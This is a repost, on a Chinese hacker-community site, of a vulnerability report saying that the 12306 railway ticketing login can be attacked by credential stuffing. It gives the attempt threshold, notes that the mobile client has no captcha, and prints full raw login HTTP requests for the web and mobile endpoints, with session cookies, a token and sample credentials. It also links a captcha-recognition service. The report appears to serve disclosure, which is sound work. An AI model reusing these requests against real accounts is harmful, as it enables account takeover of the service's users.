12306登录接口依然可被撞库攻击(验证码可识别) - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

12306登录接口依然可被撞库攻击(验证码可识别)

admin 漏洞预警

简要描述:

每个账号登陆的阀值20分钟可登录5次,验证码可识别,手机客户端无验证码

详细说明:

手机客户端无验证码



https://kyfw.12306.cn/otn/login/init

login.jpg


code 区域
POST /otn/login/loginAysnSuggest HTTP/1.1

Host: kyfw.12306.cn

Content-Length: 152

Accept: */*

Origin: https://kyfw.12306.cn

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: https://kyfw.12306.cn/otn/login/init

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4

Cookie: JSESSIONID=91FA1614F112D5178E44705FDF85E4D1; BIGipServerotn=1725497610.24610.0000; current_captcha_type=C

Connection: Keep-Alive



loginUserDTO.user_name=10000%40qq.com&userDTO.password=123456&randCode=wh6e&randCode_validate=&MTQwOTA5=ZGY5Y2ZjYjEyMjI2MWJiMg%3D%3D&myversion=undefined





手机客户端无需验证码,密码在提交的时候,md5加密即可,阀值20分钟

code 区域
POST /otsmobile/apps/services/api/MobileTicket/android/query HTTP/1.1

Host: mobile.12306.cn

Content-Length: 591

Origin: file://

Accept-Language: zh_CN

Authorization: {"morCustomRealm":"aDHgAUw92AQQCYjZyEX5TcAVgAncDZmQCAAUAewNzcgEoYAxMQjJrAEBBRWEWNX9AHnULd1w9cykTXj8xRxxxIlsxFUVPQmAfN0IlOi0iRRE7azdSPjVIIjVEGjIQNz46FVw8ZxZERQMeVSZoMF5nFU12Hk4xQ2ocGU4zYiJObDR3NSZPQCJJZEBtG2JBS3AyaF5EQgVGIU1IZ0VWBXdgTn1tCV89ajxgQDM5XyQ0PmVkVjRyBlc5Nm9oJEMSZnh2dkYcSjplfkd+NBx/GGhAWjFoFmEUZVNHLDFGKz5iaGtrYSVsEGZvdg=="}

X-Requested-With: XMLHttpRequest

x-wl-app-version: 2.0

x-wl-platform-version: 6.0.0

WL-Instance-Id: u76dbkg7kq364qrpfrp2oflm3f

Content-type: application/x-www-form-urlencoded; charset=UTF-8

Accept: text/javascript, text/html, application/xml, text/xml, */*

User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; zh-cn; GT-N7100 Build/JDQ39; CyanogenMod-0.9.9.7) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30/Worklight/6.0.0

Accept-Encoding: gzip,deflate

Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7

Cookie: BIGipServerworklight=3705078026.16420.0000; AlteonP=0a02eb040a02ebc5284cfdfd2378; JSESSIONID=0000D6oVUcQ2f3Uw70wtfc73C9v:196iqvou7; BIGipServernginxformobile=32178698.50215.0000

Connection: Keep-Alive



adapter=CARSMobileServiceAdapterV2&procedure=login&compressResponse=true&parameters=[{"baseDTO.os_type":"a","baseDTO.device_no":"53469c87548547e","baseDTO.mobile_no":"123444","baseDTO.time_str":"20150117212733","baseDTO.check_code":"170294cbd0ab3398d8ed39217170c9ad","baseDTO.version_no":"1.1","baseDTO.user_name":"10000@qq.com","password":"327bc4e22b649d47c4546a3ec93f376b"}]&__wl_deviceCtxVersion=-1&__wl_deviceCtxSession=30549131421501159027&isAjaxRequest=true&x=0.8806376396678388





识别

code 区域
http://www.80vul.com/yzm/v.php?url=http://static.wooyun.org/wooyun/upload/201501/1720224632ac157f9dd635bd901105790c35853f.jpg


80v.jpg


12306__0.jpg


12306__1.jpg


12306__2.jpg


12306__3.jpg


12306__4.jpg


12306__5.jpg

漏洞证明:

# 识别平台1

sb1.png



# 识别平台2

12306__00.jpg


12306__11.jpg


12306__22.jpg


12306__33.jpg


12306__44.jpg


12306__55.jpg


标签: 撞库攻击

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表